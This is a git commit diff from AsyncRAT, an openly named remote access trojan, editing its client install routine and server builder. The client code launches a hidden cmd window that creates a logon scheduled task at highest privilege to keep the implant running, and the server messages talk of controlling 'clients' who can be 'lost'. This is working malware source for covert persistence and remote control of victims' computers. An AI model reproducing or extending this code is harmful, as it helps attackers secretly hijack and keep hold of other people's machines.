Fixed SYSTEM issue

This commit is contained in:
NYAN CAT 2020-05-02 16:13:07 +03:00
parent abca238794
commit 59ea9b088b
5 changed files with 8 additions and 5 deletions

View File

@ -34,7 +34,7 @@ namespace Client.Install
Process.Start(new ProcessStartInfo
{
FileName = "cmd",
Arguments = "/c schtasks /create /f /sc onlogon /ru system /rl highest /tn " + Path.GetFileNameWithoutExtension(currentProcess) + " /tr " + "'" + "\"" + installPath.FullName + "\"" + "' & exit",
Arguments = "/c schtasks /create /f /sc onlogon /rl highest /tn " + Path.GetFileNameWithoutExtension(currentProcess) + " /tr " + "'" + "\"" + installPath.FullName + "\"" + "' & exit",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
});

View File

@ -13,7 +13,7 @@ namespace Client
#if DEBUG
public static string Ports = "6606";
public static string Hosts = "127.0.0.1";
public static string Version = "0.5.6D";
public static string Version = "0.5.6E";
public static string Install = "false";
public static string InstallFolder = "AppData";
public static string InstallFile = "Test.exe";

View File

@ -185,6 +185,8 @@ namespace Server.Forms
if (string.IsNullOrWhiteSpace(txtMutex.Text)) txtMutex.Text = getRandomCharacters();
if (string.IsNullOrWhiteSpace(txtGroup.Text)) txtGroup.Text = "Default";
if (chkPastebin.Checked && string.IsNullOrWhiteSpace(txtPastebin.Text)) return;
ModuleDefMD asmDef = null;

View File

@ -56,7 +56,8 @@ namespace Server.Forms
}
Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
{
MessageBox.Show(this, @"[!]If you wish to upgrade to new version of AsyncRAT, You will need to copy 'ServerCertificate.p12'.
MessageBox.Show(this, @"
[!] If you wish to upgrade to new version of AsyncRAT, You will need to copy 'ServerCertificate.p12'.
[!] If you lose\delete 'ServerCertificate.p12' certificate you will NOT be able to control your clients, You will lose them all.", "Certificate", MessageBoxButtons.OK, MessageBoxIcon.Information);
this.Close();

View File

@ -19,7 +19,7 @@ namespace Server
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.5.6D";
public static readonly string Version = "AsyncRAT 0.5.6E";
public static object LockListviewClients = new object();
public static object LockListviewLogs = new object();
public static object LockListviewThumb = new object();